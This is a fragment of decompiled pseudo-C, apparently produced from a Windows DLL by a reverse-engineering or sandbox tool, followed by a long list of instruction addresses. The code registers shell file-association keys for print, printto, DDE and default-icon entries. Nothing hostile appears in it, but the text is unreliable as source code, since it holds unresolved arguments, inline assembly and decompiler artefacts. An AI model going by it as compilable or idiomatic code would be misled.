																goto L161;
															}
															_t762 = _v136;
															if((0 | _v136 != 0x00000000) == 0) {
																L195:
																E10009538(0x80004005, _t585, _t620, _t628, _t644, _t762, _t935, _t940, _t942, _t944);
																asm("int3");
																goto L196;
															}
															if((E1003AE40(_t644, _t762) & 0xffffff00 | _t359 == 0x00000000) == 0) {
																goto L178;
															}
															goto L161;
														}
													}
													_t942 = L"command";
													_t940 = _v136;
													E10013AF0(L"%s\\shell\\print\\%s", _v136, L"command");
													r8d = 0;
													if(E10033CC4(_t620, _a32, _v96, _v136) != 0) {
														_t942 = L"command";
														_t940 = _v136;
														E10013AF0(L"%s\\shell\\printto\\%s", _v136, L"command");
														r8d = 0;
														if(E10033CC4(_t620, _a32, _v112, _v136) != 0) {
															goto L149;
														}
														_t817 = _v104 + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														if(r13d + r13d <= 0) {
															_t620 =  *((intOrPtr*)( *_t817));
															 *((intOrPtr*)(_t620 + 8))();
														}
														_t819 = _v136 + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														if(r13d + r13d <= 0) {
															_t620 =  *((intOrPtr*)( *_t819));
															 *((intOrPtr*)(_t620 + 8))();
														}
														_t821 = _v128 + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														if(r13d + r13d <= 0) {
															_t620 =  *((intOrPtr*)( *_t821));
															 *((intOrPtr*)(_t620 + 8))();
														}
														_t823 = _v88 + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														if(r13d + r13d <= 0) {
															_t620 =  *((intOrPtr*)( *_t823));
															 *((intOrPtr*)(_t620 + 8))();
														}
														_t825 = _v112 + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														if(r13d + r13d <= 0) {
															_t620 =  *((intOrPtr*)( *_t825));
															 *((intOrPtr*)(_t620 + 8))();
														}
														_t827 = _v96 + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														if(r13d + r13d <= 0) {
															_t620 =  *((intOrPtr*)( *_t827));
															 *((intOrPtr*)(_t620 + 8))();
														}
														_t762 = _v120 + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														if(r13d + r13d <= 0) {
															_t620 =  *((intOrPtr*)( *_t762));
															 *((intOrPtr*)(_t620 + 8))();
														}
														goto L192;
													}
													_t830 = _v104 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r13d + r13d <= 0) {
														_t620 =  *((intOrPtr*)( *_t830));
														 *((intOrPtr*)(_t620 + 8))();
													}
													_t832 = _v136 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r13d + r13d <= 0) {
														_t620 =  *((intOrPtr*)( *_t832));
														 *((intOrPtr*)(_t620 + 8))();
													}
													_t834 = _v128 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r13d + r13d <= 0) {
														_t620 =  *((intOrPtr*)( *_t834));
														 *((intOrPtr*)(_t620 + 8))();
													}
													_t836 = _v88 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r13d + r13d <= 0) {
														_t620 =  *((intOrPtr*)( *_t836));
														 *((intOrPtr*)(_t620 + 8))();
													}
													_t838 = _v112 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r13d + r13d <= 0) {
														_t620 =  *((intOrPtr*)( *_t838));
														 *((intOrPtr*)(_t620 + 8))();
													}
													_t840 = _v96 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r13d + r13d <= 0) {
														_t620 =  *((intOrPtr*)( *_t840));
														 *((intOrPtr*)(_t620 + 8))();
													}
													_t762 = _v120 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r13d + r13d <= 0) {
														_t620 =  *((intOrPtr*)( *_t762));
														 *((intOrPtr*)(_t620 + 8))();
													}
													goto L192;
												}
												_t843 = _v104 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t843));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t845 = _v136 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t845));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t847 = _v128 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t847));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t849 = _v88 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t849));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t851 = _v112 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t851));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t853 = _v96 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t853));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t762 = _v120 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t762));
													 *((intOrPtr*)(_t620 + 8))();
												}
												goto L192;
											}
											_t942 = L"ddeexec";
											_t940 = _v136;
											E10013AF0(L"%s\\shell\\print\\%s", _v136, L"ddeexec");
											r8d = 0;
											if(E10033CC4(_t620, _a32, L"[print(\"%1\")]", _v136) != 0) {
												_t942 = L"ddeexec";
												_t940 = _v136;
												E10013AF0(L"%s\\shell\\printto\\%s", _v136, L"ddeexec");
												r8d = 0;
												if(E10033CC4(_t620, _a32, L"[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", _v136) != 0) {
													r8d = E10039820(_t432, L" /dde");
													_t146 =  &_v120; // 0x31
													r8d = E10039820(E1000B5C0(_t146, L" /dde", _t935, _t936, _t940, _t944, _t945, _t946), L" /dde");
													_t147 =  &_v96; // 0x49
													r8d = E10039820(E1000B5C0(_t147, L" /dde", _t935, _t936, _t940, _t944, _t945, _t946), L" /dde");
													_t148 =  &_v112; // 0x39
													E1000B5C0(_t148, L" /dde", _t935, _t936, _t940, _t944, _t945, _t946);
													goto L103;
												}
												_t863 = _v104 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t863));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t865 = _v136 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t865));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t867 = _v128 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t867));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t869 = _v88 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t869));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t871 = _v112 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t871));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t873 = _v96 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t873));
													 *((intOrPtr*)(_t620 + 8))();
												}
												_t762 = _v120 + 0xffffffe8;
												asm("lock xadd [edx+0x10], eax");
												if(r13d + r13d <= 0) {
													_t620 =  *((intOrPtr*)( *_t762));
													 *((intOrPtr*)(_t620 + 8))();
												}
												goto L192;
											}
											_t876 = _v104 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											if(r13d + r13d <= 0) {
												_t620 =  *((intOrPtr*)( *_t876));
												 *((intOrPtr*)(_t620 + 8))();
											}
											_t878 = _v136 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											if(r13d + r13d <= 0) {
												_t620 =  *((intOrPtr*)( *_t878));
												 *((intOrPtr*)(_t620 + 8))();
											}
											_t880 = _v128 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											if(r13d + r13d <= 0) {
												_t620 =  *((intOrPtr*)( *_t880));
												 *((intOrPtr*)(_t620 + 8))();
											}
											_t882 = _v88 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											if(r13d + r13d <= 0) {
												_t620 =  *((intOrPtr*)( *_t882));
												 *((intOrPtr*)(_t620 + 8))();
											}
											_t884 = _v112 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											if(r13d + r13d <= 0) {
												_t620 =  *((intOrPtr*)( *_t884));
												 *((intOrPtr*)(_t620 + 8))();
											}
											_t886 = _v96 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											if(r13d + r13d <= 0) {
												_t620 =  *((intOrPtr*)( *_t886));
												 *((intOrPtr*)(_t620 + 8))();
											}
											_t762 = _v120 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											if(r13d + r13d <= 0) {
												_t620 =  *((intOrPtr*)( *_t762));
												 *((intOrPtr*)(_t620 + 8))();
											}
											goto L192;
										}
										_t889 = _v104 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r13d + r13d <= 0) {
											_t620 =  *((intOrPtr*)( *_t889));
											 *((intOrPtr*)(_t620 + 8))();
										}
										_t891 = _v136 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r13d + r13d <= 0) {
											_t620 =  *((intOrPtr*)( *_t891));
											 *((intOrPtr*)(_t620 + 8))();
										}
										_t893 = _v128 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r13d + r13d <= 0) {
											_t620 =  *((intOrPtr*)( *_t893));
											 *((intOrPtr*)(_t620 + 8))();
										}
										_t895 = _v88 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r13d + r13d <= 0) {
											_t620 =  *((intOrPtr*)( *_t895));
											 *((intOrPtr*)(_t620 + 8))();
										}
										_t897 = _v112 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r13d + r13d <= 0) {
											_t620 =  *((intOrPtr*)( *_t897));
											 *((intOrPtr*)(_t620 + 8))();
										}
										_t899 = _v96 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r13d + r13d <= 0) {
											_t620 =  *((intOrPtr*)( *_t899));
											 *((intOrPtr*)(_t620 + 8))();
										}
										_t762 = _v120 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r13d + r13d <= 0) {
											_t620 =  *((intOrPtr*)( *_t762));
											 *((intOrPtr*)(_t620 + 8))();
										}
										goto L192;
									}
									_t620 = _a32;
									if( *((intOrPtr*)(_t620 - 0x10)) == 0) {
										goto L55;
									}
									r8d = E10039820(_t318, L" \"%1\"");
									_t92 =  &_v120; // 0x31
									_t503 = E1000B5C0(_t92, L" \"%1\"", _t935, _t936, _t940, _t944, _t945, _t946);
									if(_t586 != 0) {
										r8d = E10039820(_t503, L" /p \"%1\"");
										_t93 =  &_v96; // 0x49
										r8d = E10039820(E1000B5C0(_t93, L" /p \"%1\"", _t935, _t936, _t940, _t944, _t945, _t946), L" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
										_t94 =  &_v112; // 0x39
										E1000B5C0(_t94, L" /pt \"%1\" \"%2\" \"%3\" \"%4\"", _t935, _t936, _t940, _t944, _t945, _t946);
									}
									goto L103;
								}
								_t940 = _v136;
								E10013AF0(L"%s\\DefaultIcon", _v136, _t942);
								r8d = 0;
								if(E10033CC4(_t620, _a32, _v88, _v136) != 0) {
									goto L51;
								}
								_t907 = _v104 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t907));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t909 = _v136 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t909));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t911 = _v128 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t911));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t913 = _v88 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t913));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t915 = _v112 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t915));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t917 = _v96 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t917));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t762 = _v120 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t762));
									 *((intOrPtr*)(_t620 + 8))();
								}
							} else {
								_t920 = _v104 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t920));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t922 = _v136 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t922));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t924 = _v128 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t924));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t926 = _v88 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t926));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t928 = _v112 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t928));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t930 = _v96 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t930));
									 *((intOrPtr*)(_t620 + 8))();
								}
								_t762 = _v120 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r13d + r13d <= 0) {
									_t620 =  *((intOrPtr*)( *_t762));
									 *((intOrPtr*)(_t620 + 8))();
								}
							}
							goto L192;
						}
					}
					E10029130(_t284);
					_t594 = _t626;
					_t578 = 0 | _t594 != 0x00000000;
					if(_t594 != 0) {
						E10009538(0x80004005, _t585, _t626, _t628, _t644, _t762, _t935, _t940, _t942, _t944);
						goto L195;
					} else {
						 *((intOrPtr*)( *_t626 + 0x18))();
						_t626 = _t626 + 0x18;
						_v72 = _t626;
						E1000A57C(_t565, _t578, _t585, _t586, _t626, _t940, _t942, _t944);
						r8d = r12d;
						ExtractIconW(??, ??, ??);
						if(_t626 == 0) {
							r8d = 0;
							E10013AF0(L",%d", _t940, _t942);
						} else {
							r8d = r12d;
							E10013AF0(L",%d", _t940, _t942);
							DestroyIcon(??);
						}
						_t628 = _v72;
						r8d =  *((intOrPtr*)(_t628 - 0x10));
						_t31 =  &_v88; // 0x51
						_t644 = _t31;
						E1000B5C0(_t31, _t628, _t935, _t936, _t940, _t944, _t945, _t946);
						_t762 = _t628 - 0x18;
						asm("lock xadd [edx+0x10], eax");
						_t284 = r13d + r13d;
						if(r13d + r13d <= 0) {
							_t644 =  *_t762;
							_t626 =  *((intOrPtr*)( *_t762));
							_t284 =  *((intOrPtr*)(_t626 + 8))();
						}
						goto L13;
					}
				}
				E10016544();
				goto L201;
			}
















































































































                                                                              0x10034954
                                                                              0x10034954
                                                                              0x10034954
                                                                              0x10034954
                                                                              0x10034954
                                                                              0x10034954
                                                                              0x10034961
                                                                              0x1003496a
                                                                              0x1003496c
                                                                              0x1003496f
                                                                              0x10034974
                                                                              0x10034977
                                                                              0x1003497d
                                                                              0x10034984
                                                                              0x1003498b
                                                                              0x10034990
                                                                              0x10034990
                                                                              0x10034991
                                                                              0x10034994
                                                                              0x10034997
                                                                              0x1003499b
                                                                              0x100349a0
                                                                              0x100349a5
                                                                              0x100349aa
                                                                              0x100349ad
                                                                              0x100349b2
                                                                              0x100349b4
                                                                              0x100349b9
                                                                              0x100349be
                                                                              0x100349be
                                                                              0x100349bf
                                                                              0x100349c5
                                                                              0x100349c8
                                                                              0x100349cc
                                                                              0x100349d4
                                                                              0x100349d9
                                                                              0x100349e2
                                                                              0x100349e7
                                                                              0x100349eb
                                                                              0x100349f1
                                                                              0x100349f9
                                                                              0x10035a23
                                                                              0x10035a2b
                                                                              0x10035a32
                                                                              0x10035a3c
                                                                              0x10035a44
                                                                              0x10035a44
                                                                              0x10035a4d
                                                                              0x10035a54
                                                                              0x10035a59
                                                                              0x10035a5e
                                                                              0x10035a75
                                                                              0x10035a60
                                                                              0x00000000
                                                                              0x10035a66
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100349ff
                                                                              0x100349ff
                                                                              0x100349ff
                                                                              0x10034a05
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10034a0b
                                                                              0x10034a0f
                                                                              0x10034a1c
                                                                              0x10034a21
                                                                              0x10034a25
                                                                              0x10034a33
                                                                              0x10034a38
                                                                              0x10034a3c
                                                                              0x10034a4a
                                                                              0x10034a4f
                                                                              0x10034a53
                                                                              0x10034a5d
                                                                              0x10034a61
                                                                              0x10034a66
                                                                              0x10034a6a
                                                                              0x10034a71
                                                                              0x10034b26
                                                                              0x10034b26
                                                                              0x10034b35
                                                                              0x10035a12
                                                                              0x10035a17
                                                                              0x00000000
                                                                              0x10035a17
                                                                              0x10034b3b
                                                                              0x10034b3e
                                                                              0x10034b41
                                                                              0x10034b44
                                                                              0x10034b48
                                                                              0x10034b4d
                                                                              0x10034b5c
                                                                              0x10035a07
                                                                              0x10035a0c
                                                                              0x00000000
                                                                              0x10035a0c
                                                                              0x10034b62
                                                                              0x10034b65
                                                                              0x10034b68
                                                                              0x10034b6b
                                                                              0x10034b6f
                                                                              0x10034b74
                                                                              0x10034b83
                                                                              0x100359fc
                                                                              0x10035a01
                                                                              0x00000000
                                                                              0x10035a01
                                                                              0x10034b8f
                                                                              0x10034b96
                                                                              0x10034b9b
                                                                              0x10034b9e
                                                                              0x10034bb4
                                                                              0x100358e0
                                                                              0x100358e5
                                                                              0x100358ec
                                                                              0x100358f6
                                                                              0x100358fb
                                                                              0x100358fe
                                                                              0x100358fe
                                                                              0x10035907
                                                                              0x1003590e
                                                                              0x10035918
                                                                              0x1003591d
                                                                              0x10035920
                                                                              0x10035920
                                                                              0x10035929
                                                                              0x10035930
                                                                              0x1003593a
                                                                              0x1003593f
                                                                              0x10035942
                                                                              0x10035942
                                                                              0x1003594b
                                                                              0x10035952
                                                                              0x1003595c
                                                                              0x10035961
                                                                              0x10035964
                                                                              0x10035964
                                                                              0x1003596d
                                                                              0x10035974
                                                                              0x1003597e
                                                                              0x10035983
                                                                              0x10035986
                                                                              0x10035986
                                                                              0x1003598f
                                                                              0x10035996
                                                                              0x100359a0
                                                                              0x100359a5
                                                                              0x100359a8
                                                                              0x100359a8
                                                                              0x100359b1
                                                                              0x100359b8
                                                                              0x100359c2
                                                                              0x100359c7
                                                                              0x100359ca
                                                                              0x100359ca
                                                                              0x100359cd
                                                                              0x100359cd
                                                                              0x100359d4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100359d6
                                                                              0x10034bba
                                                                              0x10034bc3
                                                                              0x00000000
                                                                              0x10034bc9
                                                                              0x10034bc9
                                                                              0x10034bcc
                                                                              0x10034be2
                                                                              0x10034be4
                                                                              0x10034be9
                                                                              0x10034bee
                                                                              0x10034bee
                                                                              0x10034bf3
                                                                              0x10034c07
                                                                              0x10034d05
                                                                              0x10034e37
                                                                              0x10034e37
                                                                              0x10034e3a
                                                                              0x10034e50
                                                                              0x10034ecd
                                                                              0x10034ecd
                                                                              0x10034ed4
                                                                              0x10034ee8
                                                                              0x10034eed
                                                                              0x10034f06
                                                                              0x10035004
                                                                              0x100352e2
                                                                              0x100352ec
                                                                              0x100352f1
                                                                              0x100352f6
                                                                              0x100352f6
                                                                              0x100352fd
                                                                              0x10035311
                                                                              0x10035316
                                                                              0x1003532d
                                                                              0x1003542b
                                                                              0x10035697
                                                                              0x10035697
                                                                              0x1003569a
                                                                              0x100356a8
                                                                              0x100356ae
                                                                              0x100356b7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100356bd
                                                                              0x100356c8
                                                                              0x100356e4
                                                                              0x100356e6
                                                                              0x100356eb
                                                                              0x100356f3
                                                                              0x100356f8
                                                                              0x10035700
                                                                              0x10035700
                                                                              0x10035705
                                                                              0x1003571a
                                                                              0x1003571c
                                                                              0x10035727
                                                                              0x1003572d
                                                                              0x10035734
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003573a
                                                                              0x00000000
                                                                              0x10035729
                                                                              0x10035729
                                                                              0x10035742
                                                                              0x10035745
                                                                              0x100359f1
                                                                              0x100359f6
                                                                              0x00000000
                                                                              0x100359f6
                                                                              0x1003574b
                                                                              0x10035751
                                                                              0x10035759
                                                                              0x10035761
                                                                              0x10035797
                                                                              0x10035797
                                                                              0x100357ab
                                                                              0x100358a9
                                                                              0x100358bf
                                                                              0x100358c4
                                                                              0x100358da
                                                                              0x100358da
                                                                              0x00000000
                                                                              0x100358a9
                                                                              0x100357b6
                                                                              0x100357bd
                                                                              0x100357c7
                                                                              0x100357cc
                                                                              0x100357cf
                                                                              0x100357cf
                                                                              0x100357d8
                                                                              0x100357df
                                                                              0x100357e9
                                                                              0x100357ee
                                                                              0x100357f1
                                                                              0x100357f1
                                                                              0x100357fa
                                                                              0x10035801
                                                                              0x1003580b
                                                                              0x10035810
                                                                              0x10035813
                                                                              0x10035813
                                                                              0x1003581c
                                                                              0x10035823
                                                                              0x1003582d
                                                                              0x10035832
                                                                              0x10035835
                                                                              0x10035835
                                                                              0x1003583e
                                                                              0x10035845
                                                                              0x1003584f
                                                                              0x10035854
                                                                              0x10035857
                                                                              0x10035857
                                                                              0x10035860
                                                                              0x10035867
                                                                              0x10035871
                                                                              0x10035876
                                                                              0x10035879
                                                                              0x10035879
                                                                              0x10035882
                                                                              0x10035889
                                                                              0x10035893
                                                                              0x1003589c
                                                                              0x1003589f
                                                                              0x1003589f
                                                                              0x00000000
                                                                              0x10035893
                                                                              0x10035763
                                                                              0x1003576e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10035772
                                                                              0x1003577f
                                                                              0x100359e6
                                                                              0x100359eb
                                                                              0x100359f0
                                                                              0x00000000
                                                                              0x100359f0
                                                                              0x10035791
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10035791
                                                                              0x10035727
                                                                              0x10035431
                                                                              0x10035438
                                                                              0x1003544c
                                                                              0x10035451
                                                                              0x10035468
                                                                              0x10035564
                                                                              0x1003556b
                                                                              0x1003557f
                                                                              0x10035584
                                                                              0x1003559b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100355a6
                                                                              0x100355ad
                                                                              0x100355b7
                                                                              0x100355bc
                                                                              0x100355bf
                                                                              0x100355bf
                                                                              0x100355c8
                                                                              0x100355cf
                                                                              0x100355d9
                                                                              0x100355de
                                                                              0x100355e1
                                                                              0x100355e1
                                                                              0x100355ea
                                                                              0x100355f1
                                                                              0x100355fb
                                                                              0x10035600
                                                                              0x10035603
                                                                              0x10035603
                                                                              0x1003560c
                                                                              0x10035613
                                                                              0x1003561d
                                                                              0x10035622
                                                                              0x10035625
                                                                              0x10035625
                                                                              0x1003562e
                                                                              0x10035635
                                                                              0x1003563f
                                                                              0x10035644
                                                                              0x10035647
                                                                              0x10035647
                                                                              0x10035650
                                                                              0x10035657
                                                                              0x10035661
                                                                              0x10035666
                                                                              0x10035669
                                                                              0x10035669
                                                                              0x10035672
                                                                              0x10035679
                                                                              0x10035683
                                                                              0x1003568c
                                                                              0x1003568f
                                                                              0x1003568f
                                                                              0x00000000
                                                                              0x10035683
                                                                              0x10035473
                                                                              0x1003547a
                                                                              0x10035484
                                                                              0x10035489
                                                                              0x1003548c
                                                                              0x1003548c
                                                                              0x10035495
                                                                              0x1003549c
                                                                              0x100354a6
                                                                              0x100354ab
                                                                              0x100354ae
                                                                              0x100354ae
                                                                              0x100354b7
                                                                              0x100354be
                                                                              0x100354c8
                                                                              0x100354cd
                                                                              0x100354d0
                                                                              0x100354d0
                                                                              0x100354d9
                                                                              0x100354e0
                                                                              0x100354ea
                                                                              0x100354ef
                                                                              0x100354f2
                                                                              0x100354f2
                                                                              0x100354fb
                                                                              0x10035502
                                                                              0x1003550c
                                                                              0x10035511
                                                                              0x10035514
                                                                              0x10035514
                                                                              0x1003551d
                                                                              0x10035524
                                                                              0x1003552e
                                                                              0x10035533
                                                                              0x10035536
                                                                              0x10035536
                                                                              0x1003553f
                                                                              0x10035546
                                                                              0x10035550
                                                                              0x10035559
                                                                              0x1003555c
                                                                              0x1003555c
                                                                              0x00000000
                                                                              0x10035550
                                                                              0x10035338
                                                                              0x1003533f
                                                                              0x10035349
                                                                              0x1003534e
                                                                              0x10035351
                                                                              0x10035351
                                                                              0x1003535a
                                                                              0x10035361
                                                                              0x1003536b
                                                                              0x10035370
                                                                              0x10035373
                                                                              0x10035373
                                                                              0x1003537c
                                                                              0x10035383
                                                                              0x1003538d
                                                                              0x10035392
                                                                              0x10035395
                                                                              0x10035395
                                                                              0x1003539e
                                                                              0x100353a5
                                                                              0x100353af
                                                                              0x100353b4
                                                                              0x100353b7
                                                                              0x100353b7
                                                                              0x100353c0
                                                                              0x100353c7
                                                                              0x100353d1
                                                                              0x100353d6
                                                                              0x100353d9
                                                                              0x100353d9
                                                                              0x100353e2
                                                                              0x100353e9
                                                                              0x100353f3
                                                                              0x100353f8
                                                                              0x100353fb
                                                                              0x100353fb
                                                                              0x10035404
                                                                              0x1003540b
                                                                              0x10035415
                                                                              0x1003541e
                                                                              0x10035421
                                                                              0x10035421
                                                                              0x00000000
                                                                              0x10035415
                                                                              0x1003500a
                                                                              0x10035011
                                                                              0x10035025
                                                                              0x1003502a
                                                                              0x10035043
                                                                              0x1003513f
                                                                              0x10035146
                                                                              0x1003515a
                                                                              0x1003515f
                                                                              0x10035178
                                                                              0x10035280
                                                                              0x1003528a
                                                                              0x100352a0
                                                                              0x100352aa
                                                                              0x100352c0
                                                                              0x100352ca
                                                                              0x100352cf
                                                                              0x00000000
                                                                              0x100352cf
                                                                              0x10035183
                                                                              0x1003518a
                                                                              0x10035194
                                                                              0x10035199
                                                                              0x1003519c
                                                                              0x1003519c
                                                                              0x100351a5
                                                                              0x100351ac
                                                                              0x100351b6
                                                                              0x100351bb
                                                                              0x100351be
                                                                              0x100351be
                                                                              0x100351c7
                                                                              0x100351ce
                                                                              0x100351d8
                                                                              0x100351dd
                                                                              0x100351e0
                                                                              0x100351e0
                                                                              0x100351e9
                                                                              0x100351f0
                                                                              0x100351fa
                                                                              0x100351ff
                                                                              0x10035202
                                                                              0x10035202
                                                                              0x1003520b
                                                                              0x10035212
                                                                              0x1003521c
                                                                              0x10035221
                                                                              0x10035224
                                                                              0x10035224
                                                                              0x1003522d
                                                                              0x10035234
                                                                              0x1003523e
                                                                              0x10035243
                                                                              0x10035246
                                                                              0x10035246
                                                                              0x1003524f
                                                                              0x10035256
                                                                              0x10035260
                                                                              0x10035269
                                                                              0x1003526c
                                                                              0x1003526c
                                                                              0x00000000
                                                                              0x10035260
                                                                              0x1003504e
                                                                              0x10035055
                                                                              0x1003505f
                                                                              0x10035064
                                                                              0x10035067
                                                                              0x10035067
                                                                              0x10035070
                                                                              0x10035077
                                                                              0x10035081
                                                                              0x10035086
                                                                              0x10035089
                                                                              0x10035089
                                                                              0x10035092
                                                                              0x10035099
                                                                              0x100350a3
                                                                              0x100350a8
                                                                              0x100350ab
                                                                              0x100350ab
                                                                              0x100350b4
                                                                              0x100350bb
                                                                              0x100350c5
                                                                              0x100350ca
                                                                              0x100350cd
                                                                              0x100350cd
                                                                              0x100350d6
                                                                              0x100350dd
                                                                              0x100350e7
                                                                              0x100350ec
                                                                              0x100350ef
                                                                              0x100350ef
                                                                              0x100350f8
                                                                              0x100350ff
                                                                              0x10035109
                                                                              0x1003510e
                                                                              0x10035111
                                                                              0x10035111
                                                                              0x1003511a
                                                                              0x10035121
                                                                              0x1003512b
                                                                              0x10035134
                                                                              0x10035137
                                                                              0x10035137
                                                                              0x00000000
                                                                              0x1003512b
                                                                              0x10034f11
                                                                              0x10034f18
                                                                              0x10034f22
                                                                              0x10034f27
                                                                              0x10034f2a
                                                                              0x10034f2a
                                                                              0x10034f33
                                                                              0x10034f3a
                                                                              0x10034f44
                                                                              0x10034f49
                                                                              0x10034f4c
                                                                              0x10034f4c
                                                                              0x10034f55
                                                                              0x10034f5c
                                                                              0x10034f66
                                                                              0x10034f6b
                                                                              0x10034f6e
                                                                              0x10034f6e
                                                                              0x10034f77
                                                                              0x10034f7e
                                                                              0x10034f88
                                                                              0x10034f8d
                                                                              0x10034f90
                                                                              0x10034f90
